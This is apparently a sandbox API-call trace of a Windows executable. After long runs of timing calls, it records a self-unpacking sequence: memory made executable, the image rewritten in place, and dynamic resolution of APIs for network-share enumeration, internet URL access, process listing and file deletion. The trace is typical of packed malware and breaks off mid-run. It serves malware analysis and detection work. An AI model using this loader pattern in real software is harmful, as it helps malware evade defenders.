0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.178] GetTickCount () returned 0x114533f [0039.178] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.179] GetLastError () returned 0x0 [0039.179] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.180] GetLastError () returned 0x0 [0039.180] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.181] GetLastError () returned 0x0 [0039.181] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.182] GetLastError () returned 0x0 [0039.182] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.183] GetTickCount () returned 0x114533f [0039.183] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.184] GetTickCount () returned 0x114533f [0039.184] GetLastError () returned 0x0 [0039.185] GetTickCount () returned 0x114533f [0039.185] GetLastError () returned 0x0 [0039.185] GetTickCount () returned 0x114533f [0039.185] GetLastError () returned 0x0 [0039.185] GetTickCount () returned 0x114533f [0039.185] GetLastError () returned 0x0 [0039.185] GetTickCount () returned 0x114533f [0039.185] GetLastError () returned 0x0 [0039.185] GetTickCount () returned 0x114533f [0039.185] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.203] GetTickCount () returned 0x114535e [0039.203] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.204] GetLastError () returned 0x0 [0039.204] GetTickCount () returned 0x114535e [0039.802] lstrcatA (in: lpString1="", lpString2="kernel32.dll" | out: lpString1="kernel32.dll") returned="kernel32.dll" [0039.807] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0039.811] LocalAlloc (uFlags=0x0, uBytes=0x90e4b) returned 0x540020 [0039.811] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0039.822] VirtualProtect (in: lpAddress=0x540020, dwSize=0x90e4b, flNewProtect=0x40, lpflOldProtect=0x18f1f0 | out: lpflOldProtect=0x18f1f0*=0x4) returned 1 [0039.853] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0039.853] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0039.853] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0039.853] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0039.853] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0039.854] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0039.854] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0039.854] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0039.854] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x44 [0039.856] Module32First (hSnapshot=0x44, lpme=0x18f840) returned 1 [0039.858] VirtualAlloc (lpAddress=0x0, dwSize=0x119e50, flAllocationType=0x1000, flProtect=0x40) returned 0x6a0000 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0039.904] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0039.904] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0039.904] SetErrorMode (uMode=0x400) returned 0x0 [0039.905] SetErrorMode (uMode=0x0) returned 0x400 [0039.905] GetVersionExA (in: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x3, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e770*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0039.905] VirtualAlloc (lpAddress=0x0, dwSize=0x119000, flAllocationType=0x1000, flProtect=0x4) returned 0x870000 [0039.937] VirtualProtect (in: lpAddress=0x400000, dwSize=0x137000, flNewProtect=0x40, lpflOldProtect=0x18f7f8 | out: lpflOldProtect=0x18f7f8*=0x2) returned 1 [0040.180] VirtualFree (lpAddress=0x870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.187] LoadLibraryA (lpLibFileName="RPCRT4.dll") returned 0x76af0000 [0040.187] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeW") returned 0x76b11635 [0040.188] GetProcAddress (hModule=0x76af0000, lpProcName="UuidCreate") returned 0x76b0f48b [0040.188] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringW") returned 0x76b31ee5 [0040.188] GetProcAddress (hModule=0x76af0000, lpProcName="RpcStringFreeA") returned 0x76b33fc5 [0040.188] GetProcAddress (hModule=0x76af0000, lpProcName="UuidToStringA") returned 0x76b6d918 [0040.188] LoadLibraryA (lpLibFileName="MPR.dll") returned 0x75660000 [0040.372] GetProcAddress (hModule=0x75660000, lpProcName="WNetOpenEnumW") returned 0x75662f06 [0040.372] GetProcAddress (hModule=0x75660000, lpProcName="WNetEnumResourceW") returned 0x75663058 [0040.372] GetProcAddress (hModule=0x75660000, lpProcName="WNetCloseEnum") returned 0x75662dd6 [0040.372] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x758d0000 [0048.502] GetProcAddress (hModule=0x758d0000, lpProcName="InternetCloseHandle") returned 0x758eab49 [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="InternetReadFile") returned 0x758eb406 [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlW") returned 0x7594be5c [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenW") returned 0x758f9197 [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="HttpQueryInfoW") returned 0x758f5c75 [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenA") returned 0x758ff18e [0048.503] GetProcAddress (hModule=0x758d0000, lpProcName="InternetOpenUrlA") returned 0x759130f1 [0048.503] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x75620000 [0048.881] GetProcAddress (hModule=0x75620000, lpProcName="timeGetTime") returned 0x756226e0 [0048.881] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0048.881] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendA") returned 0x772fd65e [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindFileNameW") returned 0x7730bb71 [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsW") returned 0x773045bf [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0048.882] GetProcAddress (hModule=0x772f0000, lpProcName="PathFindExtensionW") returned 0x7730a1b9 [0048.882] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0048.882] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0048.882] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0048.882] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeA") returned 0x76d5ef75 [0048.882] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileW") returned 0x76d6830d [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynW") returned 0x76d6d556 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0048.883] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcmpW") returned 0x76d45929 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenW") returned 0x76d41700 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSizeEx") returned 0x76d459e2 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0048.884] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="MoveFileW") returned 0x76d59af0 [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="Process32FirstW") returned 0x76d68baf [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="Process32NextW") returned 0x76d6896c [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatW") returned 0x76d6828e [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0048.885] GetProcAddress (hModule=0x76d30000, lpProcName="SetEnvironmentVariableA") returned 0x76d4e331 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="SetPriorityClass") returned 0x76d5cf28 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetComputerNameW") returned 0x76d4dd0e [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDrives") returned 0x76d45371 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0048.886] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryA") returned 0x76d6d526 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringW") returned 0x76d43bca [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatW") returned 0x76d5f481 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatW") returned 0x76d634d7 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesW") returned 0x76dc425f [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLCID") returned 0x76d43da5 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocale") returned 0x76d5ce46 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoW") returned 0x76d43c42 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreW") returned 0x76d5ca5a [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0048.887] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount") returned 0x76d4110c [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0048.888] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalMemoryStatus") returned 0x76d48b6d [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryA") returned 0x76d449d7 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="FlushConsoleInputBuffer") returned 0x76de7a9f [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="CreateDirectoryW") returned 0x76d44259 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0048.889] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileW") returned 0x76d44435 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76de793f [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="PeekConsoleInputA") returned 0x76de6f0d [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeZoneInformation") returned 0x76d4465a [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0048.890] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleCtrlHandler") returned 0x76d48a09 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="FatalAppExitA") returned 0x76dc4691 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="GetExitCodeProcess") returned 0x76d5174d [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0048.891] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="AreFileApisANSI") returned 0x76dc40d1 [0048.892] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0048.892] 